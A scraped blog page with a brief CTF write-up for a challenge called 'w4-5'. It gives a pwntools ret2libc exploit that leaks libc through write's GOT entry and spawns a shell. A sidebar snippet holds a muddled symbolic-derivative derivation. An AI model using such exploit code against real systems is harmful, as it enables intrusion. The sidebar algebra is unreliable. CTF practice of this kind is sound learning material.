w4-5

最新推荐文章于 2024-06-20 16:02:02 发布

__sunrise__

最新推荐文章于 2024-06-20 16:02:02 发布

阅读量157

点赞数

本文链接：https://blog.csdn.net/sunrise19960110/article/details/90716712

版权

漏洞：栈溢出
exp：
1、用write泄露libc
2、system("/bin/sh")

# write(1,got_write,4) back to 0x08048460
payload = 140*"a"+p32(elf.plt["write"])+p32(0x08048460)
payload += p32(1) + p32(elf.got["write"]) + p32(4)
p.sendline(payload)
write_addr = u32(p.recv(4))
system_addr = write_addr-(libc.symbols['write']-libc.symbols['system'])
binsh = write_addr-(libc.symbols['write']-next(libc.search('/bin/sh')))
# system("/bin/sh")
payload2 = 140*"a" + p32(system_addr)+p32(0x08048460)+p32(binsh)
p.sendline(payload2)
p.interactive()

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

__sunrise__

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

pyecharts带你领略动态轨迹图的风骚

05-23

8467

文章的开始先打波广告，小文的公众号也开始跟大家见面了，喜欢的我就来'小文的数据之旅'找我玩吧！后台回复pyecharts可获得本文使用的数据源。 ok，进入今天的主题！最近很多朋友问起pyecharts，尤其是地理坐标图的制作，都说被其图形之美给吸引到了。刚好今天也有同事问起来，那么今天就以pyecharts的动态地理轨迹图为例，说说该怎么使用pyecharts。 import pand...

signature=97971f76bf6bd69d4fa355e0ee23c78f,the-f2e-w4-payment-process

热门推荐

weixin_39716264的博客

05-29

2万+

# THIS IS AN AUTOGENERATED FILE. DO NOT EDIT THIS FILE DIRECTLY.# yarn lockfile v1"@babel/code-frame@^7.0.0", "@babel/code-frame@^7.5.5":version "7.5.5"resolved "https://registry.yarnpkg.com/@babel/co...

参与评论您还未登录，请先登录后发表或查看评论

vulnhub靶机-sunset：sunrise

臭nana的博客

07-19

1214

1、找到靶机ip：192.168.0.128 nma -sn 192.168.0.0/24 2、扫描靶机端口 root@kali:~# nmap -p- -A 192.168.0.128 Starting Nmap 7.80 ( https://nmap.org ) Nmap scan report for 192.168.0.128 Host is up (0.00044s latency). Not shown: 65531 closed ports PORT STATE SERVIC

vulnhub之sunrise

底层社会中的弱智

01-09

619

认识一个新工具 nikto 他是一款网页服务检测器，针对目标IP的不同端口，可以对端口上运行的服务进行扫描。老套路，第一步现在局域网找到目标主机简单来分析一下： 22号端口 ssh连接用的(简单的弱口令爆破低版本的绕过或者在后面会有提示的账户密码) 80端口万恶之源 (敏感目录等一系列的漏洞) 3306端口 mysql数据库 (可以存在sql注入敏感目录下的wen.co...

『VulnHub系列』sunset: sunrise-Walkthrough

ins1ght的博客

01-21

703

这是我完成的VulnHub上的第35个靶机。靶机发布日期：2019年12月6日，难度：初级++。标签：目录穿越漏洞、敏感信息泄露、撞库、Wine提权。

[vulnhub]sunset: sunrise Writeup

Vicl1fe的博客

12-31

632

个人博客地址 http://www.darkerbox.com 欢迎大家学习交流靶机网址： https://www.vulnhub.com/entry/sunset-sunrise,406/ 靶机知识点：靶机IP：192.168.2.129 kali IP：192.168.2.126 信息收集 nmap -sV -p- 192.168.2.129 扫目录发现啥也没有访问8080端口，...

w4sp-lab 实验环境搭建

weixin_43228504的博客

03-31

875

《wireshark与metasploit实战指南》中的w4sp-lab环境搭建避坑????

W4A16 量化

weixin_63647250的博客

06-20

1328

在进行W4A16量化后得到了新的模型，再结合KV Cache量化后模型运行时占用的显存有了非常大幅度的下降，证明我们再存储占用方面取得了很好的量化成果，这也让我们对模型速度，精度等有了更多的考虑，后续会进行更多测试得到数据结果。

W4-60c型挖掘机整机分解程序研究

06-29

通过对W4-60c型挖掘机进行数十次的分解试验，研究者们总结出了一套实用的整机分解程序，该程序不仅能够解决国内工程机械维修中对于特定机型缺乏整机分解指导的问题，而且能够提升工程机械维修的整体水平和质量。...

w4-学生.zip

09-19

【标题】"w4-学生.zip"所对应的可能是一个与教育、学习或课程相关的压缩文件。在IT领域，这样的文件通常包含一系列与教学材料、作业、项目或编程练习相关的资源。"w4"可能指的是第四周的学习内容，这在很多在线课程...

W4-3迷你型光电传感器选型手册(中文版).zip

09-12

本手册聚焦于W4-3迷你型光电传感器，为用户提供详细的选型和应用指南。在W4-3迷你型光电传感器选型手册中，首先会介绍产品的基本技术参数。这些参数包括但不限于工作电压、电流消耗、检测距离、响应时间、光束类型...

w4-bpmnplus-java-api-samples:使用 JAVA API 与 W4 BPMN+ 交互的一些示例

07-09

w4-bpmnplus-java-api-samples 该项目包含各种代码示例，这些示例将展示如何使用其 Java API 与 W4 BPMN+ 引擎交互获取样品您可以将其下载为或直接使用 git 使用以下命令 git clone ...

SICK W4-3迷你型光电开关选型册.rar

10-30

《SICK W4-3迷你型光电开关：深入解析与选型指南》 SICK作为全球知名的自动化解决方案供应商，其产品线涵盖了各种传感器技术，其中W4-3迷你型光电开关是工业自动化领域中广泛应用的一款产品。这款开关以其小巧的...

山东交通学院在江西2020-2024各专业最低录取分数及位次表.pdf

10-02

那些年，与你同分同位次的同学都去了哪里？全国各大学在江西2020-2024年各专业最低录取分数及录取位次数据，高考志愿必备参考数据

西京学院在江西2020-2024各专业最低录取分数及位次表.pdf

10-02

那些年，与你同分同位次的同学都去了哪里？全国各大学在江西2020-2024年各专业最低录取分数及录取位次数据，高考志愿必备参考数据

山西师范大学在江西2020-2024各专业最低录取分数及位次表.pdf

最新发布

10-02

那些年，与你同分同位次的同学都去了哪里？全国各大学在江西2020-2024年各专业最低录取分数及录取位次数据，高考志愿必备参考数据

沈阳工业大学在江西2020-2024各专业最低录取分数及位次表.pdf

10-02

那些年，与你同分同位次的同学都去了哪里？全国各大学在江西2020-2024年各专业最低录取分数及录取位次数据，高考志愿必备参考数据

基于Arduino平台的自动寻找物品设计源码

10-02

该项目是一款基于Arduino平台的自动寻找物品设计源码，包含302个文件，包括148个头文件、136个C语言源文件、3个Markdown文件、3个JSON文件、3个包含文件、2个C语言扩展文件、2个压缩文件、2个汇编文件、1个Git忽略文件、1个Arduino源代码文件。该系统旨在实现物品的自动定位和寻找。

桂林学院在江西2020-2024各专业最低录取分数及位次表.pdf

10-02

那些年，与你同分同位次的同学都去了哪里？全国各大学在江西2020-2024年各专业最低录取分数及录取位次数据，高考志愿必备参考数据

-z*(z - 1)*(y*(c5 - r5)*(x - 1) - w4*x*(y - 1) + x*(c6 - r6)*(y - 1) + w4*(x - 1)*(y - 1) - (c7 - r7)*(x - 1)*(y - 1) + w4*x*y - x*y*(c5 - r5))对z求一阶导，并对结果化简

06-01

对 $z$ 求一阶导数，可以将其他变量视为常数，得到： $- (z - 1) * (y*(c5 - r5)*(x - 1) - w4*x*(y - 1) + x*(c6 - r6)*(y - 1) + w4*(x - 1)*(y - 1) - (c7 - r7)*(x - 1)*(y - 1) + w4*x*y - x*y*(c5 - r5)) - z*(y*(c5 - r5)*(x - 1) - w4*x*(y - 1) + x*(c6 - r6)*(y - 1) + w4*(x - 1)*(y - 1) - (c7 - r7)*(x - 1)*(y - 1) + w4*x*y - x*y*(c5 - r5))'$ 对右边的函数进行求导，可以得到： $- (y*(c5 - r5)*(x - 1) - w4*x*(y - 1) + x*(c6 - r6)*(y - 1) + w4*(x - 1)*(y - 1) - (c7 - r7)*(x - 1)*(y - 1) + w4*x*y - x*y*(c5 - r5)) - z*(-(y*(c5 - r5)) + x*(c6 - r6) + w4*(y - 1) - (c7 - r7)*(y - 1) + w4*x - x*y*(c5 - r5))$ 化简后，可得： $w4*x - c6*x*y + r6*x*y + (c7-r7)*x*z*y - w4*z + w4*y - c5*x*y*z + r5*x*y*z + (c7-r7)*x*z - w4*(y-1) + (c7-r7)*(y-1) + y*(c5-r5)*z - y*(c5-r5) - x*(c6-r6)*z + x*(c6-r6) + (c7-r7)*(x-1)*y - (c7-r7)*(x-1)$ 因此，一阶导数为： $(c5*y - c6*x*y + r5*x*y - r6*x*y + (c7-r7)*x*y - c5*x*y*z + r5*x*y*z + (c7-r7)*x*z - c7*x + r7*x + w4*y + (c7-r7)*(y-1) - w4*x - w4*(y-1) + y*(c5*z - c5 - 1) - x*(c6*z - c6) - z*w4)$ 化简后的结果为： $(c5*(y*z - y - z + 1) - c6*x*y*(z-1) + r5*x*y*(z-1) - r6*x*y*(z-1) + (c7-r7)*x*y*(1-z) + (c7-r7)*x*(z-1) - c7*x + r7*x + w4*y - w4*x*z + (c7-r7)*(y-1))$